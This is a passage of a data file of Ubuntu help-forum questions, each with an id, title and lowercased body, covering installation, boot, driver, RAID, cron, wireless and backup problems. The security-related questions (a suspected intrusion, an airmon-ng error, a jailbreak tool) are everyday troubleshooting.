7 hpfs/ntfs/exfat warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? after selecting yes yes/no ? yes error : the backup gpt table is corrupt , but the primary appears ok , so that will be used . ok/cancel ?
252448	open all files containing certain text	i am looking for a terminal way . open all files in /foo/bar containing the string foobar . how ?
252452	qemu hardware error 0x80000021	i 'm trying to run hiren 's bootcd on qemu but it throws a hardware error 0x80000021 on a core 2 duo , maybe there is some parameter missing to fix that . $ kvm -- version qemu emulator version 1.0 ( qemu-kvm-1.0 ) , copyright ( c ) 2003-2008 fabrice bellard $ uname -a linux tiago-pc 3.2.0-37-generic # 58-ubuntu smp thu jan 24 15:28:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ lsb_release -r release : 12.04 $ cat /proc/cpuinfo output file : http : //pastebin.com/7afk8dz6 $ kvm -m 512 -cdrom path_to_the_file/hbcd_15.2.iso -boot once=d kvm : entry failed , hardware error 0x80000021 full output file the boot list is shown , but does n't matter which option i choose it always gives the same error , i 've tried on qemu-system-i386 and qemu-system-x86_64 as well , resulting in the same problem . i do upgrade and dist-upgrade every day , and i 've just tried to run it on 12.10 livecd ( of course , without upgrade ) , unless it was fixed after the release the problem still happens ! some sites i found with this error says to add the parameter -cpu core2duo or -enable-kvm but it did n't solve the bug . screen : http : //img15.imageshack.us/img15/2797/ss00.png
252457	how to remap the f1-12 keys to require the fn key + f1-12	i recently bought a new laptop , and mapped the f10/11/12 keys to media controls so that i would be able to just press , say , f10 to mute the volume . however , i now can not use the f10 key normally . can i remap the f10 command to be called when i type fn+f10 ( function key + f10 ) as i know many windows machines do ? thanks !
252460	is it possible to install theme engines ? if so , how ?	sorry if this is a stupid question i am new to linux . i recently discovered what a theme engine is and i was wondering if it 's possible to install other engines on my computer . a few themes that i have downloaded require certain engines . i am running gnome 3.4 on ubuntu . how can i find out what engines i have/where are they located and how would i add more ? thank you
252461	how can i convert a running system to boot from raid 5	i have a machine with 3 identical disks . i performed a clean installation of 12.10 on one disk . how can i convert the running system to boot off a raid5 comprised of all three disks ( one of these is in use running the system ) ? is it possible to start a raid 5 md device in degraded mode using 2 disks ( disks 2 & 3 ) , copy the data over from disk1 , boot of of 2 & 3 ( raided 5 ) and then add disk1 into the md device and let them resync ? if possible , how would i got about doing this ? what are the steps i need to perform ? and if possible , do you know of a tutorial i can follow ? [ i know something similar is possible if you want to boot off of a raid 1 , you started a degraded device and add the first disk later ] thanks .
252462	hp dv6000 am i good to go	i have a hp dv6000 and i 'm interested in ubuntu . i 'm a noob when it comes to installing any firmwares on a computer , i just wan na double check before i begin . my computer specs : model : hp dv6000 processor : intel core duo cpu t2250 @ 1.73ghz ram : 2038 mb system type : 32 bit local disk space : 12.1 gb ( ntfs ) it would be super helpful if you can recommended the version which works like a charm on my laptop . also my dvd drive is broken i ca n't burn it into a disk , can i install it with a usb or windows installer . thank you ...
252463	root cron job not running	i am trying to configure automysqlbackup to run via a cronjob to backup my dbs nightly . when i execute sudo automysqlbackup from a terminal , the process executes as expected and creates the backup archives . i then executed sudo crontab -e and added 0 2 * * * automysqlbackup to the cron jobs . this job does not run , and i ca n't find any error messages that might help . any ideas why this job is n't executing ?
252465	mp3 files copied to ntfs partition not showing up in music library	i have recently installed ubuntu and have removed any trace of windows from my pc . i have n't formatted my partitions to ext though because i do n't have a spare drive to take backups . my problem is that when i am copying new music files to my ntfs partitions , they are not showing up in any of the music players ( clementine and gmusicbrowser ) even after repeated scans though i can play them when i manually go to the directory and play them using vlc . i am even unable to add them to the play list of the music players by drag-drop . can someone tell me what 's the problem here and how can i debug it ? thanks , eg
252470	upgrade issue from 12.04	im trying to do a system upgrade from 12.04 and i walked through the steps in update manager as it stats online but it does n't tell me that a new update is available for ubuntu . it just tells me my system is up to date . any help would be greatly appreciated
252472	difference ubuntu-12.04-alternate-amd64.iso and ubuntu-12.04.1-desktop-amd64.iso	i am trying make a ubuntu bootable flash drive using the universal-usb-installer-1.9.2.4 . also i have downloaded the a file named ubuntu-12.04.1-desktop-amd64.iso which is 7.10.956 kb from a torrent from ubuntu site . when i open the universal-usb-installer . it presents the following screen it does not present the option of ubuntu-12.04.1-desktop-amd64.iso instead the closest i could find are ubuntu 12.04 desktop ubuntu 12.04 alternate amd64 please suggest what option should i choose in the step1 : select a linux distribution from the dropdown to put on your usb since it does not present the ubuntu-12.04.1-desktop-amd64.iso iso i have ?
252478	display corruption with fglrx drivers	i 've been having some problems with the amd 12.10 and 13.1 drivers . basically there always appear to be flashing lines going across my screen . it happen all the time and every key input makes it flicker . it is severely annoying and i really need to find a way to fix it without going back to the open source driver . how do i resolve this issue ? i 've attached a screenshot below , if you look at the top where the folders are you can see random black and white lines .
252484	how do i limit dropbox 's activity on the hard disk ?	on startup , dropbox runs files indexing , which brings the system pretty much to a stand still for three minutes . is there a way to restrict dropbox from accessing the hard disk , or decrease the priority of dropbox 's access to the hard disk ?
252488	my s-video out put wo n't fit to the tv	i am using lubuntu on my old think pad t30 laptop . the problem is with s-video out put and i would like to watch movies on my tv . i can see my desktop on my tv but it 's not synchronized in size . i ca n't see the right and bottom side of the desktop . ( you can imagine how this could get you frustrated ) . this installation is my second one . i re installed it after my hard disk gone bad . at the first installation there were no problem . i installed xrandr and the gui arandr but that does n't helped me .
252489	why are kde apps running on unity too slow to load	i use a few kde applications in ubuntu ; okular , kate and kile . and it seems to me that they take a lot longer to load than other programs like evince and gedit . is it because i 'm running unity instead of kde or is that just the way it is ? what can be done to reduce the loading delay ? edit : after changing my hard drive to ssd the lag is gone ( of course not only that , everything loads instantaneously now )
252492	installation via usb drive	i recently downloaded version 12.10 to a flash drive . when i try to load it , it does not go to a setup or installation page . goes to a log-in page , and asks for a username and password that i have n't established yet . is there a way to get past this page ?
252493	web pages in firefox scroll automatically . is someone intruding on my computer ?	i think there has been 3 times an intrusion in my computer . last week , i was listening music on my computer ( ubuntu 12.04.1 lts on a macbook air 4,2 ) , my hands were far from keyboard and trackpad ( on a real book ) and firefox had the focus . i 'm not a geek and not a 'mum-and-dad ' user . i saw the web page i had opened self-scrolling a few ( not reloading ) . i move the moose and 5 min later it happened again . i disable wifi . at that time amule was running . skype too . some ports were open but not for my ip address . my system was updated 3 hours ago ( but not the kernel ) and so up-to-date . 10 min later , the ubuntu update manager prompt me updates for the linux kernel . one package was named using russian ( linux-image-generic ) . it never happened before , so i did n't applied it yet . yes , i 've added russian language to keyboard-maps and russian virtual/visual keyboard . 3 days later i saw again an open web page self-scrolling in firefox . amule was n't running , but skype was . one day later ( now ) , i even find some packages ' names translated in russian in ubuntu software center . not apps , only packages . 1 . how can i know if there has been an intrusion in my computer ? 2 . how can i know if someone remotely changed/corrupted some packages or configuration in my system ? 3 . especially something concerning the update manager ? and firefox profile ? latter , using ( for the first time ) sudo lsof -i | grep established i did n't notice any strange connection ( but i may be wrong ) . and ( the first time too ) chkrootkit answer checking `sniffer ' ... wlan0 : packet sniffer ( /sbin/wpa_supplicant [ 1052 ] , /sbin/dhclient [ 21907 ] ) please do n't answer me make a new firefox profile or install a new system ( i can take that decision and do it ; - ) ) : i want to know , understand , fix and being protected next time . here is : the output of sudo lsof -i -n -p
252495	monitor 1 turns off	i just recently upgraded from ubuntu 12.04 lts to 12.10 . since the upgrade i have had problems with my displays . this bug was one of them . now however it seems almost randomly my primary monitor losses signal . its a 42 '' tv over hdmi but my second ( regular lg over analog ) stays on , however it 's frozen . i end up having to power cycle my machine when ever this happeneds . i have had the same set up for months and ever since i upgraded it 's become an issue .
252497	no bootsplash screen shown when starting ubuntu on hp laptop	i use ubuntu 12.04 on my hp 6730s : i have a problem shown in this youtube video : http : //www.youtube.com/watch ? v=t0eq3fnruqo the video shows my computer booting up , showing the hp logo , then a black screen for quite a while , then the lightdm log in screen . is it becausee i have no video card driver ? i ca n't install it , it 's the intel 4 mobile chipset family .
252506	application window never appears ( gnome ssh tunnel manager )	i 'm having an issue with gstm failing to generate a window , it opened once , prior to a reboot , and i had moved it to workspace 3 ( not sure if this is relevant ) i 'm using ubuntu 12.10 with a pretty much default unity setup ( minor , in-band modifications ) now , following a reboot ( no changes made ) when gstm is run , it will open the tunnels that i originally created , however it never displays a window . any ideas ? is there a way to debug the application to see if it even attempts to generate a window ( capture xorg connection ? ) thanks !
252512	how much power does a dedicated graphics card consume when only the integrated card is used ?	my desktop machine has an intel i5 cpu with integrated graphics and a dedicated geforce card . through blacklisting the nvidia driver in linux and by using two cables , i 'm planning to use the integrated intel card for linux and the dedicated nvidia card for windows . since the whole idea is to consume less power when using linux , i was wondering if anybody knows how much power the dedicated card will consume when it 's not initialized and whether it might be necessary to unplug the power cable from it to really save on power consumption .
252513	constant fan spinning	almost every action i initiate , like opening the terminal or clicking a menu , makes the fan start spinning . that did not happen on windows , for instance . and it does n't seem normal , so how can i make sure that my system is running fine ? can i somehow fix this abnormal fan function ? i 'm running ubuntu 12.10 64-bit on a dell laptop .
252514	serial console configuration	so i have an ubuntu server ( 12.10 ) running on shuttle xs36v . this computer is totaly headless ( just connected on the tv while installing ) . now , i 'm trying to use the serial port to connect to my box ( in case network is unavailable ) . by the way , that does n't work at all : ( i followed https : //help.ubuntu.com/community/serialconsolehowto on the server : root @ server # dmesg | grep ttys0 [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.5.0-23-generic root=/dev/mapper/vg00-lvroot ro console=tty0 console=ttys0,115200n8 [ 0.000000 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-23-generic root=/dev/mapper/vg00-lvroot ro console=tty0 console=ttys0,115200n8 [ 0.000000 ] console [ ttys0 ] enabled [ 1.720744 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 1.777564 ] 00:09 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a i have also configured ttys0 : root @ server # cat /etc/init/ttys0.conf # ttys0 - getty # # this service maintains a getty on ttys0 from the point the system is # started until it is shut down again . start on stopped rc or runlevel= [ 2345 ] stop on runlevel [ ! 2345 ] respawn exec /sbin/getty -l 115200 ttys0 vt102 on the client side ( ubuntu desktop 12.10 , but also tried windows 7 ) , i have just plugged the rs232 to usb cable and dmesg show that : root @ client # dmesg ... [ 8722.807731 ] usb 1-1.2 : new full-speed usb device number 5 using ehci_hcd [ 8722.900863 ] usb 1-1.2 : new usb device found , idvendor=067b , idproduct=2303 [ 8722.900872 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 8722.900877 ] usb 1-1.2 : product : usb-serial controller d [ 8722.900882 ] usb 1-1.2 : manufacturer : prolific technology inc. [ 8722.945131 ] usbcore : registered new interface driver usbserial [ 8722.945147 ] usbcore : registered new interface driver usbserial_generic [ 8722.945159 ] usb serial support registered for generic [ 8722.945163 ] usbserial : usb serial driver core [ 8722.945517 ] usbcore : registered new interface driver pl2303 [ 8722.945532 ] usb serial support registered for pl2303 [ 8722.945549 ] pl2303 1-1.2:1.0 : pl2303 converter detected [ 8722.947531 ] usb 1-1.2 : pl2303 converter now attached to ttyusb0 by the way , when running screen /dev/ttyusb0 115200 nothing happened ( of course my user belong to dialout group ) ... only a blask screen . any idea ? thanks for help
252515	is it possible for ubuntu 12:10 to re-install my lost windows 7 home 64-bit , ? if possible which are all the steps to do it ?	i have no ubuntu experience , i did install ubuntu 12:10 recently cause i have read and overheard that ubuntu could fix my windows 7 64-bit re-installation . this is my last recourse . i have tried a few things already with windows with no success . i have a dell desktop which came with no full windows 7 home 64-bit disk . dell provides users with what they call a `` re-installation disk of the os already installed in your computer original hdd '' . i also made `` rescue disks # 1 and # 2 '' as per their suggestion . i downloads an iso image of the windows 7 version i own . i also have the key code of my windows activation with microsoft i have tried to re-install with the dell data safe , i tried reinstalling following detailed instructions both from seven forums community as well as microsoft forums . nothing worked . aside from the ssd which i had the win os installed and now also has ubuntu 12:10 i also own another 7 hdds of different sizes and brands . i had the os installed in more than just the ssd , in fact of all 8 disks only one boots windows although after bypassing a boot error message . all i want to do know is to recover ( or reinstall ) win on the ssd so my last 2 recourses left for me ( ao so i think ) are . a . use ubuntu to recover ( if possible ) and b. use the files still existent on the recovery partition on the hdd that still boots to make a clean copy of a booting windows 7 on the ssd/ could anyone help me with my situation ? thank you kindly .
252517	broadcom wireless does n't work	i installed ubuntu 12.10 , it works fine , but the wireless does n't work . i have broadcom 4313 .
252520	ca n't boot from usb when installing ubuntu	i downloaded ubuntu 11.10 32bit and put it in on usb drive using universal usb installer from http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ . i then restarted my laptop . i pressed esc and chose `` boot management '' , but there was no option for booting from usb . the only options i could see were boot from hard drive and boot from internal cd/dvd . what should i do ? i have already changed the boot order at bios and it still did n't work . my system is 64-bit , but does it matter if i want to install a ubuntu 32-bit ?
252522	airmon-ng problem : chipset unknown	when i run sudo airmon-ng start wlan0 , i get this as the output : dell @ ubuntu : ~ $ sudo airmon-ng start wlan0 [ sudo ] password for dell : found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 1545 avahi-daemon 1546 avahi-daemon 1552 networkmanager 1615 wpa_supplicant 11753 dhclient process with pid 11753 ( dhclient ) is running on interface eth1 interface chipset driver eth1 unknown wl - [ phy0 ] why is the chipset unknown ? it should say something like this `` ( monitor mode enabled on mon0 ) ''
252526	ubuntu 12.10 taking a very long time to install from live dvd on a very fast desktop	i 'm trying to install ubuntu 12.10 from a dvd onto a very fast desktop . my first installation attempt was very slow , taking over an hour for the `` copying files ... '' stage . then it seemed to stall completely when downloading updates . after it sat on the same step for a very long time i pulled the plug to start fresh . now i am trying again ; this time with the checkbox about installing package update unchecked ( since that seemed to be the straw that broke the camel 's back last time ) . again , the `` copying files ... '' stage is taking a very , very long time considering the speed of this desktop ( including ssd ) . i expanded the console to try to find some clue about what 's going on , but there 's nothing useful there . no errors , just what seems like normal commands that are spaced way too far apart in time . feb 7 21:07:05 ubuntu install.py : keeping language packs for : en_us.utf-8 feb 7 21:17:01 ubuntu cron [ 17922 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) from 21:07 to 21:17 , the only command shown is `` keeping language packs '' ? ! i do n't know exactly what to ask , except : why is 12.10 installation from a live dvd so , so , so slow on a fast desktop ? update additionally , while stalled , there seems to be nothing happening , including no dvd spinning . update 2 the second installation was just as slow as the first , despite skipping the update-packages step . i allowed it to finish and after the 2.5-3 hour install time things are working . after installation i began to have other problems like very slow 'apt-get update 's and an extremely slow untar that took ~5-6 hours to extract a 16gb gzipped tar with default compression . more research has led me to worry that these problems may be caused by my ssd ( plextor px-256m3 ) and/or ext4 's interaction with it . for reference , i previously had 12.04 installed using btrfs ( which had it 's own host of insane problems ) . i tweaked several recommended ssd settings , including adding `` discard '' to /etc/fstab as well as the line tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 and adding to cron.daily : sudo fstrim -v / my next step is to upgrade the firmware for my ssd ... update 3 after upgrading my ssd firmware i 've still had lots of slowness related to disk activity . i decided to re-install after a week of painfully slow use and ran into the same problems again during installation . this time , i tried several different things including : install 12.10 32-bit from live dvd , with btrfs again ( which worked well before my recent installations ) install 12.04.2 32-bit from live dvd , with btrfs install 12.04.2 32-bit from usb disk image , with ext4 all of these failed . hard . insanely slow installs ( i let the latest attempt of 12.04.2 32-bit go all night and it was 2/3 done ) with nothing happening on the dvd drive or the usb drive . resolution after trying so many variations of things i was beginning to lose hope , but it struck me that all of my attempts had been with 32-bit ubuntu . i downloaded the iso for 12.04.2 64-bit this morning and it installed ( with ext4 ) in less than 5 minutes , including downloading updates and third-party packages ! performance is great again and all is well .
252531	ubuntu one nokia n8 streaming music from cloud	player from the website ( one.ubuntu.com ) in my nokia browser does n't work . is there an alternative ? how to fix it ?
252533	mysql server shuts down periodically on ubuntu	mysql server shuts down periodically on ubuntu . i looked through the system log file and found the following lines in the log files i checked : out of memory : kill process 719 ( mysqld ) score 114 or sacrifice child we are however using just about 20 % of the allocated memory . what could be the cause of this problem ?
252535	failing backup , ubuntu 12.04	after i installed ubuntu 12.04 , my automatic backup has n't been working . i get that it failed with an unknown error , and the following output : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1411 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1404 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1255 , in main action = commandline.processcommandline ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 999 , in processcommandline globals.backend = backend.get_backend ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 158 , in get_backend return _backends [ pu.scheme ] ( pu ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/_boto_single.py '' , line 49 , in __init__ import boto importerror : no module named boto i have n't changed anything from 10.10 . the specified backup location is my amazon s3 account . i have tried to google this , but could n't find anything helpful . thanks !
252537	could not find kernel image 'vesamenu.c32 ' while booting from usb stick	i wiped the usb clean , downloaded and used universal-usb-installer-1.9.2.4.exe -- i had already downloaded 12.04 and created the usb on a desktop running win7 ultimate . the usb bootable stick was for an acer aspire one lapbook without a cd drive . do i need to find this 'vesamenu.c32 ' file or try another version of ubuntu to get this to work ? i love ubuntu and have never had this problem or any problems before .
252541	installed ubuntu on external hardrive , tried to boot got grub rescue ?	i installed ubuntu 12.10 onto an external hard drive after i partitioned it and everything went well . assuming i could boot ubuntu i rebooted the computer and i went into windows 7 , i wanted to be in ubuntu so i rebooted . i received the no such device grub rescue error when i booted . i tried boot option , the external hard drive was not option so now i 'm stuck using the ubuntu disk . i tried with grub rescue through terminal but ubuntu was located at /dev/sdd5 366683648 699115007 1329725440 83 linux which was not recognized so i tried the grub rescue windows by entering sudo mount /dev/sda1 /mnt and i received this : mount : special device /dev/sda1 does not exist even though when i entered fdisk -l the report said : device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility i tried super grub disk 2 , it found windows 7 but could not recover without reverting to previous save . it suggested that i unplug all external devices and retry . after i unplugged all devices super grub disk 2 could not find the os . i ran sudo fdisk -l and received the same list as before . there is also another problem and i believe they are related when i enter ls into the grub rescue command prompt i get ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) not the normal ( hd0 ) ( hd0 , y ) ( hd0 , w ) etc . i tried ls ( hd0 ) /boot the message i received was no such file system . update : i tried ubfan1 's suggestion but i ca n't seem to mount it sudo mount /dev/sde5 /mnt & & sudo mount -- bind /dev /mnt/dev & & sudo mount -- bind /proc /mnt/proc & & sudo mount -- bind /sys /mnt/sys & & sudo mount -- bind /dev/pts /mnt/dev/pts & & sudo cp /etc/resolv.conf /mnt/etc/resolv.conf & & sudo chroot /mnt i recieved the error message : chroot : can not change root directory to /mn : no such file or directory is the error my code or something else ?
252544	update error while trying to install spotify	i 'm trying to install the spotify client on ubuntu , and i 'm fairly new to linux , so i ca n't figure out how to resolve this error message that i keep getting : w : failed to fetch http : //repository.spotify.com/dists/stable/non-free/binary-amd64/packages something wicked happened resolving 'repository.spotify.com : http ' ( - 5 - no address associated with hostname ) this error message comes up 3 times ( each with a slightly different opening url ) every time i try to run sudo apt-get update . i 've looked around the internet for answers , i 've changed my dns , but i ca n't get past this error message . what am i doing wrong ?
252546	install gnome onscreen keyboard ( gok ) in ubuntu 12.04	according to this link the gnome on-screen keyboard should be available for v12.04 , but when i click the link there for gok in software center apt : //gok , it tells me : not found there isn’t a software package called “gok” in your current software sources . so , what repository do i need to enable ( and the command [ s ] to add it ) in order to install gok ? i want to try that on screen keyboard instead of the default `` onboard '' , because onboard wo n't show me which key [ s ] is/are being pressed on the physical keyboard . thanks !
252552	how can i have the applications listed on an application menu be invoked on a remote system ?	i can invoke an application via a command line in a terminal emulator : $ ssh -x rome xeyes i can also invoke an application from a gui application menu on a panel . i can have two gui application menus on a panel . how can i have all of the applications listed on the second application menu be invoked on a remote system rather than having to use the terminal emulator ?
252554	does oem-config create a user not in sudo group ?	my friend just bought a netbook with xubuntu preinstalled and the user was created right in store without giving her a root password . neither was it an admin user . was it oem-config 's fault or store stđ°ff 's ? tip : to solve this boot into recovery mode , choose root and execute mount -o remount , rw / passwd root
252559	installing ubuntu on hp padvilion dv6	ok so i want to install ubuntu 12.04 or 12.10 on my hp pavillion dv6 laptop . i know it 'll install but the problem is that it has a radeon switchable graphic card . so when i install ubuntu is always using the high processing one and i do n't know how to switch it to the low end one . or how to switch my track pad on or off .
252560	using native connection while still connected to a vpn	i 'm setting up a vpn server on a remote development server . the development server has websites that i 'm developing and the vpn is in place so that i can tell apache to only accept local connections to view the development sites ( instead of opening them to internet and using access control ) . however , not having set up a vpn server before , i have a question regarding the client 's connection . let 's say i 'm connected to the vpn . how can i make it so that only traffic going to certain addresses are sent through the vpn , and all other requests go through my native connection ? it 's a little hard to explain so feel free to ask me for more info .
252564	juju for non ubuntu operating systems	i have a question for juju . does juju support other os like centos or even windows ? in other words , can juju launch nodes using the os that i define for it and manage multi-os type of platforms ?
252566	run xswipe at startup	i want to run xswipe for my xps 13 ( sputnik ) build . i have added it to gnome-session-properties . the command is : perl ~/xswipe-master/xswipe.pl but it does not run at startup . any ideas ? thanks
252571	big problem with broadcom 4313 connecting/staying connected to ubuntu 12.10	alright , im still new to ubuntu and this has been a frustrating process as i imagined it would be . heres the problem , i have a hp g6 with the broadcom bcm4313 . i can get it to connect sometimes by following all sorts of other threads , but when i do the connection speed is 1 mbps . all of a sudden though , i dont even have the option to connect to a wifi signal anymore . it doesnt recognize any wifi signals or anything . after reboot the only way to even connect to wifi is to run sudo modprobe brcmsmac any help is greatly appreciated . if you need more info please let me know . edit : after fresh reboot : eric @ ekoshykar-hp : ~ $ sudo lsmod [ sudo ] password for eric : module size used by nls_iso8859_1 12714 1 snd_hda_codec_hdmi 32049 1 snd_hda_codec_idt 70210 1 joydev 17458 0 parport_pc 32689 0 ppdev 17074 0 rfcomm 46620 12 bnep 18141 2 coretemp 13401 0 kvm 414071 0 ghash_clmulni_intel 13221 0 aesni_intel 51038 0 cryptd 20404 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel hp_wmi 18049 0 sparse_keymap 13891 1 hp_wmi microcode 22804 0 snd_hda_intel 33492 3 snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event btusb 22475 0 bluetooth 209249 22 rfcomm , bnep , btusb snd_timer 29426 2 snd_pcm , snd_seq wmi 19071 1 hp_wmi snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq mac_hid 13206 0 i915 520621 3 uvcvideo 76750 0 videobuf2_core 32852 1 uvcvideo videodev 120310 2 uvcvideo , videobuf2_core snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc drm_kms_helper 49113 1 i915 drm 288721 4 i915 , drm_kms_helper i2c_algo_bit 13414 1 i915 video 19336 1 i915 mei 40691 0 psmouse 95595 0 serio_raw 13216 0 lpc_ich 17062 0 rts_pstor 433850 0 soundcore 15048 1 snd snd_page_alloc 18485 2 snd_hda_intel , snd_pcm lp 17760 0 parport 46346 3 parport_pc , ppdev , lp usb_storage 48839 1 r8169 61651 0 eric @ ekoshykar-hp : ~ $ sudo iwconfig user @ host : ~ $ sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' l1nk5y5 '' mode : managed frequency:2.412 ghz access point : 00:25:9c : c3:89 : f6 bit rate=1 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=22/70 signal level=-88 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:60 missed beacon:0 user @ host : ~ $ and the final comand has no output ?
252577	how do i install the evasi0n jailbreak tool ?	i 'm trying to jailbreak my ipod touch with a tool called evasi0n . i have downloaded the package , but i have no idea how to run/install it . i am trying to do this on a dell latitude d830 with an intel core 2 duo and 4gb of ram .
252580	are there any pc-98 emulators for ubuntu ?	that is , are there any programs for emulating an nec pc-9801 ( the computer the first five touhou games were made for ) designed to run natively on ubuntu ( or linux in general ) ? i have n't been able to find any .
252581	mail server configuration for a home user ?	okay i 'm totally lost with mail server configurations . i use getmail and mbsync to receive email and mutt 's built-in smtp support to send email ; i use the same procedure for both gmail ( i rarely use the web interface ) and my work email . upon installing mutt on a new ubuntu installation i 'm being asked to choose between the options below internet site ; mail is sent and received directly using smtp mail sent by smarthost ; received via smtp or fetchmail mail sent by smarthost ; no local mail local delivery only ; not on a network no configuration at this time i 'm confused because i do n't remember ever answering this prompt before and i do n't know if gmail.com and my work 's exchange server are considered smarthosts and/or if getmail and mbsync are considered smtps . so yeah , which of the choices above should i be choosing ? possibly related : cron is n't sending emails like it has in the past and i 'm trying to figure out why . thanks
252583	log file size or age	i 'd like to change various log files ( particularly auth.log ) to retain info for anywhere from the last 30-90 days . right now it only has about 4 days worth of info . how do i modify these settings via the gui or command prompt ? thanks !
252587	emulate ubuntu on a `` slow '' machine	how would i be able to emulate ubuntu running on a machine of a certain technical specification ? i have decided to run ubuntu in a virtual machine . in virtualbox , i can limit the amount of ram the virtual machine can get but i can not limit the amount of cpu . without physically trying the software on a computer , how would i be able to emulate the physical specifications of the system , such as cpu , network and a 5400rpm hard disk ?
252592	i need a codec for my dell i8200 , 10.04 , dvd	i 'm running 10.4 on a dell i8200 , and my dvd wo n't work .
252601	gnome-shell forgets theme after reboot ?	i am using ubuntu 12.10 with gnome-shell from the gnome-3-team/gnome3 ppa . this is working great , and i have my custom theme setup . the only issue i am running into is that gnome-shell seems to forget the theme after every reboot . if i open gnome-tweak-tool the correct theme is selected , however it is not applied ; if i select anything else and then re-select the theme it is then applied correctly . what could be causing this ? it does not seem to be related to a specific theme , as i am getting the issue with both mountain shell and elegance colours .
252606	why are alerts still coming if a job is commented out in cron ?	in cron entry i have disabled the ignite recovery tape backup . but still we are getting alerts as : the action /opt/osit/omniback/bin/check_make_recovery.pl failed crontab entry : # ignite recovery tape # 30 22 * * 2 /opt/osit/omniback/bin/make_recovery_script.sh > /dev/null 2 > & 1 what 's the reason for this ? can you help me stop these alerts ?
252607	which java package should i use : openjdk or oracle jdk ?	i 'm new to java development under ubuntu . when i typed javac in the terminal , it prompted me to install openjdk and a bunch of other jdks . i want to know if there is any difference between openjdk 7 and oracle 's jdk 7 . are they basically the same ? thanks .
252608	md5 checksum cross-platform compatibility	i was just checking a md5 checksum to see if a file has downloaded correctly or not . situation is like this . i have downloaded a linux iso file in windows and checked the md5 with the microsoft 'file checksum integrity verifier ' utility . it is giving a different checksum from the one displayed on the linux os website . q . is the md5 checksum different ( or same ) on different os types ( winxp , win7 , linux etc ) ?
252612	how do i install libreoffice 4 ?	i want to download and install libreoffice 4 . how can i do this ?
252615	problem with lvm over mdadm with ntfs . is it possible ?	i am a bit of a linux newbie , and i have come across an error that i dont really know how to troubleshoot . my idea is to cram 6tib drives into a box , make three sets of raid1 , then stretch a logical volume over the three raided sets . then make a samba share with an ntfs filesystem for a neat fileserver for a small production environment . here is my error : user @ fsrv : ~ $ sudo mount /dev/box1/recordings /rec -t ntfs ntfs signature is missing . failed to mount '/dev/mapper/box1-recordings ' : invalid argument the device '/dev/mapper/box1-recordings ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? user @ fsrv : ~ $ here is lsblk : user @ fsrv : ~ $ sudo lsblk name maj : min rm size ro type mountpoint sda 8:0 0 29.8g 0 disk ├─sda1 8:1 0 243m 0 part /boot ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 29.6g 0 part ├─box1-root ( dm-0 ) 252:0 0 15.8g 0 lvm / ├─box1-swap_1 ( dm-1 ) 252:1 0 7.9g 0 lvm [ swap ] └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sdb 8:16 0 931.5g 0 disk └─md0 9:0 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sdc 8:32 0 931.5g 0 disk └─md0 9:0 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sdd 8:48 0 931.5g 0 disk └─md1 9:1 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sde 8:64 0 931.5g 0 disk └─md1 9:1 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sdf 8:80 0 931.5g 0 disk └─md2 9:2 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm sdg 8:96 0 931.5g 0 disk └─md2 9:2 0 931.4g 0 raid1 └─box1-recordings ( dm-2 ) 252:2 0 2.7t 0 lvm user @ fsrv : ~ $ here is fdisk -l : http : //paste.ubuntu.com/1623016/ here is pvdisplay , vgdisplay , and lvdisplay : http : //paste.ubuntu.com/1623019/ does anyone know what the root cause would be ? or what my next troubleshooting step would be ?
